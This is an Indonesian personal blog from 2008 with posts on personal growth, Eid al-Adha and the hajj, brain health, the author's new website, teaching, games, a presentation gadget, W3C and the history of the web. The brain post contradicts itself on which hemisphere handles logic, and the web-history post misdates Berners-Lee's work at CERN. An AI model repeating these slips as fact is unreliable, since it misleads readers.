Jika dilihat foto diatas memang berbeda bentuknya, tapi serupa orangnya. Photo diatas adalah photo saya mulai dari SD, MTsN, SMA sampai awal saya masuk Kuliah. Mirip Gga’ kira-kira ? Ya… pasti miriplah. Orangnya itu juga kok. Hanya usia saja yang berbeda. Tapi jika diperhatikan baik-baik gambar diatas, anda bisa tau akan karakteristik saya seperti apa. Apakah cengeng, penyabar, pemarah, perajuk, pemimpin, penggoda, pemalu, perusuh, pe..,, pe…,, dll pokoknya terserahlah mau dibilang apa. Yang jelas photo saya diatas adalah dokumentasi usia saya mulai dari SD sampai saya Kuliah.

 

Dari photo saya diatas, sekarang saya sadar kalau saya sudah dewasa dan bukan anak-anak kecil lagi. Walaupun status saya belum menikah, namun saya merasakan kalau saya sudah harus dapat menentukan jalan hidup saya sendri dan harus berani mengambil keputusan dengan bijaksana, baik untuk diri pribadi, keluarga maupun orang lain.

Read more >>

Monday, December 15, 2008

Menghargai Waktu Itu Perlu…


Santai_di_ruang_server Tidak terasa waktu berlalu begitu cepat. Dari detik kemenit, dari menit ke-jam, dari jam berpindah ke hari, dari hari beranjak ke minggu, dan dari minggu kebulan, bulan ke tahun, tahun ke bla..bla..bla...dst. Seakan-akan kita yang dikerjar oleh waktu, bukan kita yang mengejar waktu. Entah bahasa (diatas) yang mana yang cocok disampaikan, saya pun juga ga' ngerti. Tapi sebenarnya yang ingin saya fokuskan kepada teman-teman sekalian adalah bagaimana menghargai waktu yang kita punya agar bisa di manfaatkan untuk aktivitas yang bermanfaat bagi kelangsungan hidup kita. Yah... mengapap tidak... Dizaman sekarang ini kita selalu berusaha mencari yang terdepan, kalau tidak, kita akan tertinggal jauh dengan saingan-saingan kita, apalagi bagi kompetitor-kompetitor dalam dunia kerja. Bisa-bisa lahannya diambil orang. Nah, jadi menghargai waktu sangatlah penting agar kita tidak terlalu lalai didalam melaksanakan aktivitas-aktivitas didalam kehidupan kita sehari-hari dan kita akan dapat menambahkan kualitas hidup kita.
Saya tidak tau juga apakah mungkin karena saya sudah beranjak dewasa atau bagaimana, tapi yang jelas sekarang saya sudah bisa berfikir bahwasanya waktu itu sangat penting didalam aktivitas saya sehari-hari. Misalkan saja kuliah saya. Saya mulai kuliah pada tahun 2004 (semester 1) dan sekarang saya sudah pada posisi “hampir akhir” (semester 9). Dan sekarang ini saya merasakan ilmu yang saya punya tidak lebih dan tidak kurang sama seperti dulu pada saat saya baru pertama kali masuk kuliah di Jurusan Sistem Informasi UIN Suska Riau.
Nah untuk menghilangkan perasaan tersebut dan untuk meningkatkan kualitas hidup saya, saya harus mengisi setiap kekosongan waktu saya untuk terus belajar dan mencari pengalaman-pengalaman yang bermanfaat untuk kehidupan saya dimasa depan nanti. Sebab jika tidak saya lakukan hal demikian maka setiap waktu dan setiap hari yang saya kerjakan adalah pekerjaan yang tak seharusnya saya lakukan, jadi otomatis itu akan membuang-buang waktu saja dan sudah melewatkan usia singkat kita ini untuk melakukan hal-hal yang bermanfaat.

Read more >>

Thursday, December 11, 2008

Mengambil Hikmah 10 Zulhijjah

Tidak terasa 10 Zulhijjah sudah berlalu, walaupun suasana hari raya masih terasa hangat, namun dipadati dengan kegiatan-kegiatan rutin rasanya hari raya kurban sudah berlalu. Memang sih sebenarnya hari raya ini lebih di fokuskan kepada orang-orang yang berjuang ditanah Suci, tapi sebenarnya kita juga harus dapat mengambil hikmah dari semua kejadian-kejadian yang terjadi pada waktu silam pada saat Allah memerintahkan kepada Nabi Ibrahim untuk menyembelih anaknya Ismail.Mungkin sebagian orang berfikir bahwa nabi Ibrahim sangatlah kejam tega mau membunuh anaknya si Ismail, atau sekejam-kejamnya harimau, tidak akan mau memakan anaknya. Nah, mungkin menurut pemikiran singkat kita, kejadian ini memanglah sangat kejam atau biadab, tapi Allah SWT telah merencanakan agar supaya hambanya yang selalu taat Kepada-Nya untuk memiliki sifat yang sabar, ikhlas dan rela berkorban di jalan Allah meskipun harus mengorbankan harta kita yang paling berharga.

Pada kejadian Nabi Ibrahim AS tersebut diatas, sebenarnya masih banyak lagi hikmah-hikmah lain yang bisa kita ambil dan kita tauladani di dalam hidup kita sehari-hari. Contoh lain misalkan, pelaksanaan ibadah haji yang dilaksanakan bagi orang-orang yang mampu. Mampu disini tidak hanya untuk diri pribadi yang naik haji, orang yang ditinggalkanpun haruslah dapat mencukupi kebutuhan sehari-harinya.

Ditanah Suci Mekah kita tidak hanya sekedar dapat melakukan kegiatan-kegiatan dalam ibadah haji saja. Kita juga bisa mengambil hikmah-hikmah di sebalik tempat-tempat bersejarah lainnya yang ada ditanah Suci. Banyak sekali tempat-tempat bersejarah Islam yang dapat mengingatkan kita pada kejadian-kejadian dulu dimana para nabi banyak melakukan aktivitas-aktivitas tertentu yang patut kita tauladani. Yang jelas pada tanggal 10 Zulhijjah yang lalu kita dapat mengambil hikmah dari kejadian-kejadian yang terjadi pada saat di tetapkannya 10 Zulhijjah sebagai hari raya Idul Adha...

Keyword postingang :
Hikmah hari raya, hikmah hari raya idul adha, hikmah hari raya kurban, hikmah hari raya haji, hari raya haji, hari raya kurban, hari raya idul adha, hari raya
Read more >>

Sunday, December 7, 2008

SELAMAT HARI RAYA IDUL ADHA 1429 H


Saya mengucapkan :

"SELAMAT HARI RAYA IDUL ADHA 1429 H, MINAL AIDIN WALFAIDZIN, MOHON MAAF LAHIR DAN BATIN... "

Semoga apa yang telah kita lakukan di alam maya ini, dapat menjadikan kita sebagai hamba Allah yang selalu beriman dan bertakwa kepada-Nya, serta selalu melakukan hal-hal yang positif yang mengarahkan Islam ke arah kejayaan yang abadi. Amin...  

Tengku Khairil Ahsyar (sekeluarga)
Read more >>

Kecerdasan Otak Manusia

Gambar otak manusia...Manusia hidup didunia ini tidak terlepas dari daya fikir manusia untuk berusaha berbuat sesuatu yang lebih baik dan bersifat menguntungkan. Bagaimana tidak, otak sebagai sentral pengendali perbuatan manusia haruslah terus dilatih dan dijaga agar dapat berfungsi secara maksimal dan dapat melakukan perbuatan-perbuatan yang bersifat menguntungkan, bukan kearah yang tidak menguntungkan. Sebagaimana yang kita ketahui didunia ini hanya ada 2 perbuatan, yakni baik dan buruk (negatif dan positif).

Otak manusia pada dasarnya terdiri dari 2 belahan, yang pertama adalah belahan sebelah kiri dan yang satunya lagi adalah belahan sebelah kanan. Adapun belahan otak yang sebelah kiri sering melakukan perbuatan-perbuatan yang bersifat logika, perkataan, angka, daftar dan urutan. Sedangkan otak yang sebelah kanan melakukan perbuatan yang bersifat keindahan, irama, angan-angan, perbedaan warna, dll.

Jadi jika kita lagi sedang belajar atau berfikir kearah logika maka otak yang bekerja adalah otak belahan kanan, dan jika yang kita lakukan adalah sesuatu hal yang bersifat imajinasi, visualisasi dll otak yang bekerja adalah otak belahan kanan.

Otak manusia agar dapat bekerja secara maksimal haruslah terus dilatih dan di beri masukan, masukan yang dapat diterima oleh otak diantaranya adalah :

Oksigen yang cukup

Oksigen sangatlah dibutuhkan oleh otak, jika otak kekurangan oksigen, maka kita akan sering terasa malas, mengantuk dan lebih gawatnya tidak mau berfikir. Salah satu cara untuk mengadopsi oksigen ke otak adalah dengan melakukan gerakan-gerakan atau dalam hal ini sering-seringlah kita berolahraga, karena dengan berolah raga atau melakukan gerakan-gerakan akan menggerakkan darah keotak dengan membawa oksigen. Jadi berolahraga sangatlah penting untuk kesehatan tubuh kita pada umumnya dan otak pada khususnya. Sebaliknya janganlah selalu menghirup udara yang kotor. Misalkan merokok, atau menghirup polusi udara yang lainnya.

Nutrisi yang baik

Nutrisi bagi otak memang wajib, jika kita tidak tidak memasukkan nutrisi kedalam tubuh kita, otak tidak akan dapat tumbuh dan berkembang. Adapun nutrisi yang bergizi dapat memicu perkembangan otak dengan kehadiran zat-zat yang sangat diperlukan oleh hormon otak. Diantaranya seperti  DHEA dan DHA. Jadi jangan sungkan-sungkan untuk makan makanan yang bergizi.

Informasi-informasi yang bermanfaat

Selain Oksigen dan Nutrisi, otak juga membutuhkan informasi-informasi. Informasi-informasi yang bermanfaat sangatlah penting bagi otak untuk melatih daya fikir manusia. Jika otak tidak dilatih untuk berfikir maka otak manusia akan berkarat dan akan tidak berfungsi sebagaimana mestinya. Kepintaran manusia ditentukan dari kecerdasan otaknya. Untuk melatih itu, seseorang tidak hanya dapat melakukannya di tempat-tempat formal saja melainkan dapat juga dilakukan dari keingin sendiri untuk belajar dan mencari sesuatu yang baru.

Perhatian dan Kasih Sayang

Otak merupakan bagian tubuh manusia yang paling sensitif. Misalkan pada waktu kita belajar, kadangkala otak tidak mau menerima ilmu-ilmu yang kita pelajari pada saat kita dalam keadaan tidak tenang. Biasanya otak lebih mau menerima ilmu-ilmu yang kita pelajari pada saat kita merasa rileks, tenang dan santai dalam menerima ilmu. Nah... jadi bukan manusia pada umumnya saja yang membutuhkan kasih sayang dari orang lain, otak juga harus diberi kasih sayang yang cukup agar supaya mampu menerima informasi-informasi yang dibutuhkan oleh manusia tersebut. Jadi... Sayangilah otak demi kehidupan kita yang lebih baik...
Read more >>

HAJI : Mukhtamar Islam Se-Dunia

"Dan berserulah kepada manusia untuk mengerjakan Haji niscaya mereka akan datang kepadamu dengan berjalan kaki, dan mengendarai unta yang kurus yang datang dari segenap penjuru yang jauh (Q.S. Al-Hajj (22):27)"

Dasar Hukum Haji

Secara etimologi haji berarti tujuan, maksud dan menyengaja. Sedangkan secara terminologi haji adalah menyengaja mendatangi Ka'bah dan tempat-tempat tertentu pada waktu tertentu untuk menunaikan amalan-amalan tertentu.
Kewajiban menunaikan ibadah haji didasarkan pada firman Allah SWT yang terdapat dalam surat Ali Imran (3) : 97; al-Baqarah (2) ayat 196-197; dan Q.S.al-hajj (22) ayat 27-28. Ayat-ayat ini didukung pula oleh banyak hadis Nabi SAW, diantaranya sabda Nabi SAW yang artinya : "Agama Islam itu dibina atas lima perkara bersaksi bahwa tiada Tuhan melainkan Allah dan sesungguhnya Muhammad itu pesuruh Allah, mendirikan sembahyang, menunaikan zakat, berpuasa Ramadhan dan mengerjakan haji." (HR Bukhari).

Berdasarkan ayat dan hadis Nabi SAW maka seluruh ulama sepakat mengatakan bahwa haji wajib hukumnya sekali seumur hidup bagi mereka yang memiliki kemampuan. Bagi mereka yang memiliki kemampuan dan tidak mau menunaikan ibadah haji maka mereka dipandang sebagai orang yang telah melakukan dosa besar.

Ibadah Haji/Umrah yang dilakukan umat Islam memiliki banyak hikmah, diantaranya adalah sebagai sarana penghapus dosa. Sabda Nabi SAW pernah mengatakan bahwa "Diampunkan dosa bagi orang yang mengerjakan haji dan bagi mereka yang dimintakan ampun oleh orang yang berhaji." (HR Al-Tabrani dan Al-Hakim); "suatu umrah kepada umrah yang lain adalah kaffarah (menghapuskan segala dosa) diantara keduanya dan haji yang mabrur (diterima) itu tiada balasan baginya selain surga." (HR Bukhari).

Sumber : Buletin Dakwah Edisi: XI/No.1/2008

Read more >>

Saturday, December 6, 2008

Akhirnya Website Pribadiku Selesai Juga

Terimakasih kepada kedua orang tua saya yang telah membesarkan saya, terimakasih kepada orang-orang yang telah bermurah hati untuk membagikan ilmunya kepada saya, dan yang terkhusus buat ICT Center Pekanbaru yang telah membesarkan saya dan yang telah banyak memberikan fasilitas kepada saya hinggakan saya dapat lebih kreatif didalam mengembangkan hobby saya sebagaimana yang sedang saya galakkan. Di kota Pekanbaru tepatnya tengah malam menyambut tanggal 6 Desember 2008, sekitar kurang lebih jam 11-an, saya telah berhasil meng-upload data Website Pribadi saya, dengan alamat domainnya http://ayel.ict-pekanbaru.net. Rencana kedepannya saya akan mengusahakan untuk mempunyai domain baru biar lebih sesuai dengan website yang saya launcing dan sekaligus biar bisa mencerminkan langsung orangnya. 


Website pribadi yang telah saya hosting merupakan website yang kedua setelah website yang pertama saya simpan di server sekolah lenyap entah kemana. Website pribadi saya yang pertama mengingatkan saya pada saat pertama kali saya mendalami ilmu Desain Web dan ilmu PHP disekolah. Kala itu saya tidak sendirian melainkan juga saling sharing dengan teman-teman yang lain yang ada di SMK Labor. Dan akhirnya saya juga tidak mengira website pribadi saya yang kedua ini bisa saya rancang dan telah louncing dengan mulus. Yah... walaupun belum di uji tingkat keamanannya, saya harapkan website pribadi saya yang sudah saya launching dapat memberikan sensasi baru bagi saya dan teman-teman untuk dapat saling berbagi ilmu dan informasi di alam maya ini lewat media website/blog.
Jadi website pribadi saya yang kedua ini lebih menekankan kepada administrasi web dan sedikit belajar mendesain, walaupun bentuk websitenya tidak begitu bagus seperti yang anda lihat sekarang (di alamat : http://ayel.ict-pekanbaru.net).
Akhir kata, bagi teman-teman yang pengen berkunjung ke website baru saya, saya harapkan dapat memberikan kritik dan saran di kotak "kritik dan saran", karena kritik dan saran dari teman-teman sekalian merupakan masukan dan cermin bagi diri saya pribadi. Thnk's...
Read more >>

Thursday, December 4, 2008

Update Ilmu Untuk Mengajar

"Lain padang lain belalang, lain lubuk lain ikannya..." Pepatah ini sungguh berkenaan dengan kegiatan yang sedang saya lalui. Bermodalkan kemampuan teori hasil dari autodidak dan ilmu-ilmu yang diperoleh dari kampus serta luar sekolah, berusaha untuk dapat memajukan pendidikan yang ada di Provinsi Riau ini khususnya bagi orang-orang yang membutuhkan ilmu seputar dunia komputer. Bagaimana tidak, mulai dari adek-adek saya yang ada di SMK Labor sampai para orang-orang tua yang sudah mencapai jenjang Strata tanpa saya sadari sudah pernah melakukan sharing ilmu bersama saya. Bukannya ingin memamerkan kemampuan atau apa-apa, disini saya hanya ingin sedikit memberikan motivasi kepada teman-teman yang lagi membaca artikel saya ini, bahwasanya kita hidup didunia ini lebih bermakna jika kita dapat saling membantu antara satu dengan yang lainnya. Jadi yang saya ceritakan ini hanyalah menceritakan apa yang telah saya alami selama saya merantau di tanah Riau ini hingga sekarang. 

Masalah mengajar disekolah atau kadang-kadang menjadi instruktur kecil, dari satu sisi saya merasakan lebih asyik mengajar orang dibawah umur saya jika dibandingkan saya mengajar orang-orang di atas umur saya. Tapi kadang kala kalau dipikir-pikir, memang lebih mudah mengajar orang-orang diatas umur jika dibandingkan dengan orang-orang dibawah umur. Yang jelas semuanya itu banyak sekali tantangan dan pengalaman yang saya dapati didalam saya melakukan proses kegiatan belajar/mengajar maupun instruktur. Jadi mau yang lebih tua ataupun yang lebih muda yang penting pengalamannya.

Jujur saja, saya merasakan tanggung jawab seorang guru merupakan tanggung jawab yang mulia didalam mencerdaskan anak bangsa, dan merupakan kegiatan yang tidak mudah dilakukan jika kita tidak memiliki disiplin ilmu dan skil yang memadai didalam mengajar. Apalagi menjadi seorang guru pada zaman sekarang ini. Mungkin bisa saja murid yang lebih hebat jika dibandingkan dengan gurunya. Menurut saya, orang yang hebat adalah orang yang lebih dulu menguasai informasi, apapun itu. Jadi jika kita tidak lebih duluan mengetahui informasi yang akan disampaikan kepada orang lain, maka niscaya kita akan menemui tantangan-tantangan yang berat dibandingkan dengan kita telah menguasai informasi yang akan disampaikan kepada orang lain tersebut. 

Saya berani mengatakan hal ini karena saya pernah merasakan bahwa ilmu yang selalu di update bagaikan panglima perang yang memiliki banyak strategi dalam medan perang. Bagaimana tidak... Jika orang tersebut menguasai informasi lebih cepat, maka orang tersebut lebih padat ngomongnya jika dibandingkan dengan orang yang jarang mengupdate informasi. Yang jelas tidak hanya sekedar teori, melainkan harus dibarengi dengan praktek. Apalagi ilmu yang akan diterapkan adalah ilmu pengetahuan yang berkaitan dengan Teknologi Informasi seperti saat sekarang ini.

Jadi, jangan pernah berhenti mengupdate informasi (ilmu-ilmu) terbaru selagi kita masih bisa mendapatkan informasi-informasi tersebut. Dan jangan pernah berhenti untuk terus berusaha mencerdaskan anak bangsa ini dari segala keterpurukan...


Read more >>

Wednesday, December 3, 2008

Demam Game Empires I dan II

Rasanya bagaikan berada pada zamannya kerajaan-kerajaan dulu. Kok bisa ya...?!?!?! ya... iyalah, masa ya iya dunk...! he... Sejenak mengingat saat pertama kali saya datang ke Pekanbaru, pada waktu itu saya bersama Sulaiman(anak Dabo asal Sungai Buluh) teman seperantauan yang kemaren kuliah di Universitas Islam Riau. Pada saat suntuk Dialah yang memperkenalkan kepada saya sebuah permainan di komputer (Game Empires I dan II) yang suasana gamenya seperti berada di zaman dulu pada saat berjayanya kerajaan-kerajaan terkenal yang pernah berdiri di muka bumi ini. Ya... Empires I dan II memang pertama kali dikenalkan oleh teman saya Si Sulaiman hinggakan tidak terasa sudah berjalan hampir 5 tahun saya masih menyenangi permainan (Game) komputer itu. 

Mengapa saya bercerita demikian? yah... karena sampai sekarangpun saya masih senang main yang namanya game Empires tersebut. Mungkin disini karena game tersebut dapat dijalankan lewat jaringan makanya game ini menjadi lebih ramai dan seru lagi dengan keikutsertaan teman-teman dan adik-adik saya yang berada di SMK Labor Pekanbaru.

Jadi tanpa dipungkiri, memang sampai sekarang saya masih betah duduk didepan komputer hanya untuk menghabiskan waktu bermain game Empires ini (setelah selesai kerjaan maksudnya). Memang untuk saat sekarang ini game Empires ini lagi seru-serunya di mainkan oleh para penggammer-penggammer yang ada di SMK Labor.

Sebenarnya kalau dipikir-pikir, versi untuk game Empires ini sudah ada yang lebih terbaru, tapi kebanyakan teman-teman dan adik-adik saya termasuklah saya, lebih menyenangi versi Empires I dan II. Selain tidak terlalu berat, game ini juga memang suasananya asyik serta lebih simple jika dibandingkan dengan versi terbaru.

Memang game buatan Microsoft ini benar-benar telah membuat saya menjadi kecanduan untuk bermain game, apalagi kalau diajak sama mereka-mereka (penggammer) untuk bermain, rasanya berat lidah untuk menolak tawaran mereka. Ya... dari pada saya berbuat yang enggak-enggak, mendingan saya refresing (main game) sejenak sambil mengingat masa-masa kerajaan dulu...

Read more >>

eFlash Alat Presentasi Berkonsep Mini

Biasanya, untuk melakukan presentasi bisnis para pekerja kantoran mengandalkan OHP (Over Head Projector) yang kebanyakan berbodi besar, dan tentunya harus terkoneksi dengan PC atau mungkin laptop. Kini lewat eFlash, urusan presentasi bisa lebih mudah lagi. Desainnya yang mungil, serta mudahnya dihubungkan ke proyektor atau bahkan TV ini menjadi unggulan utamanya. Untuk mengoperasikannya, disediakan remote control yang terintegrasi dengan laser point.

File presentasi yang anda tampilkan cukup disimpan dalam sebuah kartu memori berjenis SD atau MMC. Jadi, kita tidak perlu lagi bantuan PC. Selain itu, perangkat ini juga dilengkapi kemampuan ‘Auto slide show’ dan zooming.

Berikut Spesifikasinya:
  • Dimensi: 103 x 115 x 53 mm
  • Keluaran: TV output PAL dan NTSC
  • Tampilan: true color dengan resolusi VGA (lebih dari 640 x 480)
  • Format yang didukung: Microsoft Word, Excel, Power Point, Adobe PDF, Macromedia Flash, JPEG
  • Tipe Memori: SD card dan MMC card
  • Remote: Remote control diintegrasikan dengna laser pointer
  • Kemampuan lain: Auto slide show dengan variable rate mampu menyimpan ratusan halaman dokumen Word, Excel dan Power Point pada sebuah memory card kemampuan zooming ketika menampilkan spreadsheets atau bentuk jadi index page dengan thumbnail beserta nama file.


Sumber : http://www.teknologinet.com
Read more >>

Monday, December 1, 2008

World Wide Web Consortium - W3C

World Wide Web Consortium (W3C) mengembangkan teknologi (spesifikasi, petunjuk -- guide line, software, dan tool) yang dapat dioperasikan pada platform manapun, membawa web mencapai petensi yang utuh sebagai suatu forum informasi, commerce, komunikasi, dan perjanjian bersama (collective understanding).

W3C dibentuk pada Oktober 1994, dengan jumlah anggota lebih dari 400 organisasi anggota dari seluruh dunia, dan telah menghasilkan pengakuan internasional untuk kontribusinya pada perkembangan web. W3C kini merupakan badan resmi yang membuat standar web. W3C meletakkan gabungan spesifikasi dalam standar web, berikut adalah hasil dari W3C :
  • Standar web yang paling mendasar adalah HTML, CSS, dan XML
  • Standar HTML yang terakhir adalah XHTML 1.0


sumber : ayel dan buku HTML

Keywords :
html, scipt html, belajar html, tutorial html, html pemula, www, belajar web, belajar html, belajar script html, html bagi pemula
Read more >>

Sejarah Lahirnya Web

Pada tahun 1993, Tim Berners-Lee dan peneliti lain di European Particle Physics Lab (Consei Europeen pour la Recherche Nucleaire, atau CERN) di Geneva, Swis, mengembangkan suatu cara untuk men-share data antar koleganya menggunakan sesuatu yang disebut dengan hypertext. Pemakai di CERN dapat menampilkan dokumen pada layar komputer dengan menggunakan software browser baru. Kode-kode khusus disisipkan kedalam dokumen elektronik ini, memungkinkan pemakai untuk meloncat dari satu dokumen ke dokumen lainnya pada layar dengan hanya memilih sebuah hyperlink. Kemampuan internet dimasukkan ke dalam browser ini sehingga loncat dari satu dokumen ke dokumen lain, tidak lagi dari satu komputer saja, tetapi dapat meloncat ke dokumen lain yang letaknya pada komputer remote. Seorang peneliti dapat juga mengirimkan sebuah file dari komputer remote ke sistem lokalnya, atau log in ke dalam suatu sistem remote hanya dengan mengklik hyperlink, tidak perlu melalui mekanisme FTP atau Telnet. Jalan pintas CERN digunakan sebagai dasar yang sekarang disebut juga dengan World Wide Web (sekarang di maintenance oleh World Wide Web Consortium).Dengan konsep diataslah diperkirakan lahirnya web...

Keywords :
sejarah web, sejarah lahirnya web, sejarah pemrograman web, sejarah website, sejarah weblog.
Read more >>

Yang Paling Banyak Dicari

 

Copyright © 2014 by Tengku Khairil Ahsyar